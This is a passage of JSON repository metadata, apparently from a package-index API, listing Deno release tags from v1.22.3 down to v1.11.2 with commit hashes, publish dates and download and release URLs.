v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"